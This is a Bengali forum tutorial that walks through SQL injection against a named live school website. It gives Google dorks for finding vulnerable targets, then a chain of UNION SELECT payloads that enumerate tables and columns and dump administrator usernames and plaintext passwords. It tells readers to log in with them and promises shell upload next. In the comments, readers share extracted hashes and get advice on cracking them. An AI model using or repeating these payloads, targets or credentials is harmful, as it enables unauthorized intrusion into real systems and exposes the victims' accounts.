ওয়েব হ্যাকিং [পর্ব-০১] :: ‍SQL Injection বাংলায়

সবাইকে শুভেচ্ছা জানিয়ে শুরু করছি টেকটিউনসএ আমার প্রথম টিউন।

শুরুতে কিছুতে কথা বলে নিই। আমরা যারা ইন্টারনেট ব্যবহার করি তারা হ্যাকিং এর সাথে মোটামুটি সবাই পরিচিত। হ্যাকিং শব্দটি শুনলেই রোমাঞ্চ অনুভব করি। কিন্তু আসলে এটি নীতি বিরূদ্ধ একটি কাজ।  এবং এর দ্বারা অন্যের ক্ষতি সাধিত হয়। তবে বর্তমানে আমাদের দেশের তরুন হ্যাকাররা হ্যাকিং কে প্রতিবাদের একটি অস্ত্র হিসেবে নিয়েছে যার ফলে আমাদের দাবীগুলো জনসম্মুখে আসছে। এ ব্যাপারে আমরা সবাই জানি তাই আর বেশি কিছু লিখতে চাই না।

আমি হ্যাকিং কি, হ্যাকার কারা এসব লিখে টিউন বড় করতে চাই না। এ নিয়ে টেকটিউনস এ অনেক ভালো টিউন আছে যা আপনারা ইতোমধ্যে পড়েছেন।

আমরা সবাই SQL Injection ধরনের হ্যাকিং এর কথা জানি। অনেকে এটা করেছি। আমি একটি লাইভ সাইট সহ আপনাদের সাথে এর একটি টিউটোরিয়াল শেয়ার করছি।

আগেভাগে বলে রাখি, আমি কোনো হ্যাকার না। হ্যাকিং সম্পর্কে আমার প্রথম ধারনা টেকটিউনস থেকেই আসে। এবং এরপর বিভিন্ন জায়গা থেকে অল্পস্বল্প শিখেছি।

আমার এই অল্প জ্ঞান আমি আপনাদের সাথে শেয়ার করতে আগ্রহী। যারা একেবারে নতুন তাদের এই টিউনটি কাজে লাগবে বলে আশা করি।

[এই টিউনটি কারো ক্ষতির উদ্দেশ্যে লেখা হচ্ছে না। শুধু মাত্র যাতে নিজেদের নিরাপত্তা নিশ্চিত করা যায় এবং এই ধরনের হ্যাকিং সম্পর্কে সবাই সচেতন হয় সেজন্য লেখা হয়েছে।]

[অভিজ্ঞ হ্যাকার ভাইদের প্রতি অনুরোধ আমার কোন ভুল হলে ধরিয়ে দেবেন]

প্রথমেই বলে নেই SQL একটি কোয়েরি ভাষা। তবে কোডিং এর ত্রুটির কারনে এটাতে এরর তৈরী হয় যা একজন হ্যাকারকে সাইটের ডেটাবেসে একসেস করতে সুযোগ করে দেয়। তো চলুন শুরু করি।

প্রথমেই আপনাকে সাইট খুজতে হবে।

নিচের যেকোনো একটি ডর্ক গুগল এ গিয়ে লিকে সার্চ করুন: [টেকটিউনসএ অনেক গুগল ডর্ক আছে]

inurl:events.php?id=

inurl:pages.php?id=

inurl:index.php?id=

inurl:search.php?id=

inurl:project.php?id=

inurl:site.php?id=

inurl:members.php?id=

আপনি অনেক সাইট পাবেন।

এরপর আপনাকে দেখতে হবে সাইট টি injectable কিনা ।

এর জন্য আপনাকে url এর শেষে একটি ‘ বসাতে হবে ।

যদি ডাটাবেজের কিছু মিসিং আসে বা পেজের কিছু ইরর আসে তাহলে বুঝবেন সাইট টি injectable ।

যেমন : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″

এখন injectable সাইটে inject করার জন্য আপনাকে প্রথমে ডাটাবেজের কলাম বের করতে হবে ।

এজন্য আপনাকে ভার্নাবল সাইটের লিংকের শেষে একটি কমান্ড ব্যবহার করতে হবে ।

আমি একটি সাইট পেয়েছি।

http://lomonosov-lyceum.ru/students/?page=4

এইটার শেষে একটা ‘ দিয়ে দেখেন , দেখবেন ডাটা মিস করছে ।‘

যাই হোক , আমাদের ডাটাবেজের কলাম বের করতে হলে +order+by+ কমান্ড দিতে হবে ।

তাহলে লিংকটি দাড়ায়

http://lomonosov-lyceum.ru/students/?page=4 order by 10—

কিন্তু এরর দিচ্ছে।

Unknown column '10' in 'order clause'

অন্যভাবে চেষ্টা করি  http://lomonosov-lyceum.ru/students/?page=4 order by 8--

আবার এরর

Unknown column '8' in 'order clause'

আরেকবার করি:

http://lomonosov-lyceum.ru/students/?page=4 order by 7—

এরর দিচ্ছে না। তার মানে আমাদের কলাম ৭ টি এবার আমরা ভালনারেবল কলাম বের করব।

এর জন্য এরকম করুন:

Now change the URL like this http://lomonosov-lyceum.ru/students/?page=-4 UNION SELECT ALL 1,2,3,4,5,6,7--

দেখতে পাচ্ছি কলাম ৫ শো করছে। অর্থাৎ এটিই ভালনারেবল।

এর জন্য আপনাকে আবার একটি কমান্ড ব্যবহার করতে হবে ।

এখন আগের লিংকে শুধু 5 এর জায়গায় version() দিতে হবে ।

তাহলে লিংক টি দাড়ায়

http://lomonosov-lyceum.ru/students/?page=-4 UNION SELECT ALL 1,2,3,4,version(),6,7--

এই লিংকে গেলে আমরা ভার্সন দেখতে পাবো । এটার ভার্সন 5.0.77-log ভার্সন 5 এর নিচে সাইট গুলো হবে তা বাদ দিয়ে অন্যগুলো সাইট inject করতে চেষ্টা করবেন ।

এখন আমরা আরেকটি কমান্ড ব্যবহার করে টেবিল বের করব ।

এক্ষেত্রে ভার্নাবল কলামের বদলে group_concat(table_name) কমান্ড দিবো এবং শেষ কলামের পর +from+information_schema.tables+where+table_schema=database()– কমান্ড দিবো ।

তাহলে লিংকটি দাড়ালো

http://lomonosov-lyceum.ru/students/?page=-4 UNION SELECT ALL 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database()—

লিংকে গেলে আপনি কিছু টেবিল দেখতে পাবেন

এই সাইটের টেবিল গুলো হল

blog_article,blog_comment,blog_resource,blog_user,foto_albom,foto_resource,guestbook,lab_article,lab_comment,lab_files,lab_resource,lab_user,menu,new_on_site,news_article,news_comment,news_resource,submenu,submenu_files,submenu_resource,users

এখন এখান থেকে এডমিন টেবিল বের করতে হবে ।

এক্ষেত্রে আপনাকে একটু বুদ্দ্বি খাটাতে হবে ।

users এডমিন টেবিল মনে হয় ।

ধরে নিতে না পারলে বা ভুল ধরলে সমাস্যা নেই ।

কমান্ডের মাধ্যমে বের করতে হবে । এক্ষেত্রে আপনাকে ভার্নাবল সাইটের বদলে group_concat(column_name) কমান্ড দিতে হবে । এবং শেষ কলামের পর +from+information_schema.columns+where table_name=0x

দিতে হবে এবং 0x এর পর আপনার ধরে নেয়া এডমিন টেবিলের হেক্স রুপান্তর দিতে হবে ।

এই লিংক থেকে টেক্স থেকে হেক্সে রুপান্তর করতে পারবেন

http://www.swingnote.com/tools/texttohex.php

এখানে users কে হেক্সে রুপান্তর করলে হয় 7573657273 | তাহলে লিংকটি দাড়ায়

http://lomonosov-lyceum.ru/students/?page=-4 UNION SELECT ALL 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name=0x7573657273--

আপনি এডমিন টেবিল ধারনা না করতে পারলে আপনি 0x এর পর অন্যান্য টেবিলের হেক্স রুপান্তর দিয়ে চেষ্টা করবেন । যেটাতে id,password,username বা এরকম সম্পর্কিত কিছু দেখাবে তখন বুঝবেন ওইটি এডমিন টেবিল ।

যেহেতু আমরা বুঝেছি users এডমিন টেবিল এর হেক্স রুপান্তর দিয়ে লিংকে গিয়ে আমরা পেলাম কিছু এডমিন কলাম ।

name,passwd,rights

এখন আমরা এডমিন কলাম থেকে সাইটে লগিনের জন্য ইউজারমেম আর পাসওয়ার্ড বের করবো ।

এজন্য আমাদের শেষ কমান্ড ব্যবহার করতে হবে ।

এজন্য আমাদের ভার্নবল কলামের বদলে group_concat(name,0x3a,passwd) কমান্ড দিবো ।

তাহলে লিংক টি দাড়ায়

http://lomonosov-lyceum.ru/students/?page=-4 UNION SELECT ALL 1,2,3,4,group_concat(name,0x3a,passwd),6,7 from users--

আমরা ইউজারনেম এবং পাসওয়ার্ড পেয়ে গেছি:

administrator:lomonosov2013,Alex:saitlomonos2013

এবার এডমিন প্যানেল বের করে যেকোনো একটা দিয়ে লগিন করুন।

আমার ধারনা আমরা সবাই এডমিন প্যানের বের করার পদ্ধতি জানি। তাই আমি বর্ণনা করলাম না। তবে যদি আপনারা না জানেন তবে আমি চেষ্টা করব এ নিয়ে একটি টিউন করতে।

পরবর্তী টিউন এ আমি শেল আপলোড করার পদ্ধতি শেয়ার করব আজকের মত এখানেই শেষ। সাবইকে ধন্যবাদ।

কোন সমস্যা হলে টিউমেন্ট এ জানান।

আর আমার ছোট সাইটটি ভিজিট করতে পারেন:       http://zawad.ga

Level 0

আমি জাওয়াদ। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 4 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 11 টি টিউন ও 148 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

প্রযুক্তি এবং কবিতা দুটোকেই ভালোবাসি!


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

আমি অত্যন্ত দু:খিত যে ডোমেইনটি এক্সপায়ার্ড হয়ে গিয়েছে। আসলে আমি কিছুদিন আগে টিউন করার জন্য আমার কম্পিউটারে ড্রাফ্ট করে রেখেছিলাম তখন সাইটটি ঠিক ছিলো। আমার উচিত ছিলো আগে চেক করে টিউন করা। আমি এর জন্য ক্ষমাপ্রার্থী। আমি চেষ্টা করছি আরেকটি ভালনারেবল সাইট দিতে।

ta hole modify kora dorkar

    আমি মোডিফাই করতে চাচ্ছি না কারন আমি কোন লাইভ সাইট খুজে পাচ্ছি না। আপনি ডর্ক ব্যবহার করে সাইট খুজতে পারেন। আমি সাইট পেলেই মোডিফাই করে দিবো। আর আপনার কাছে থাকলে সেটা দিয়ে আমাদের সাহায্য করতে পারেন। টিউমেন্টের জন্য ধন্যবাদ

অনেক কিছু শিখতে পারব বলে আশা করতেছি

    আশা করি আপনাদের অনেক কিছু উপহার দিতে পারব। ধন্যবাদ আপনার মন্তব্যের জন্য।

vai ai porjonto aslam : [email protected]:4f41182b534b001562e9bb3353378f58,

etake text akare ki vabe pabo… r admin panel ta to khuje pacchi na

    http://md5decrypt.co.uk theke hash crack koren ar admin panel finder theke admin panel ber koren.ami pc theke asle check kore dekbo

      @জাওয়াদ লিয়ন:
      vai aponar sathe amar kichu kotha ase. apnar numberta diyen. amar mail [email protected]

        দু:খিত কারন আমি অমার নাম্বার দিতে পারছিনা। কিন্তু আপনি আমার সাথে ইমেইলে যোগাযোগ করতে পারেন। আমি অপনাকে ইমেইল করেছি। জবাব দেন।

Level 0

ভাই অনেক সুন্দর লিখেছেন। ধন্যবাদ ।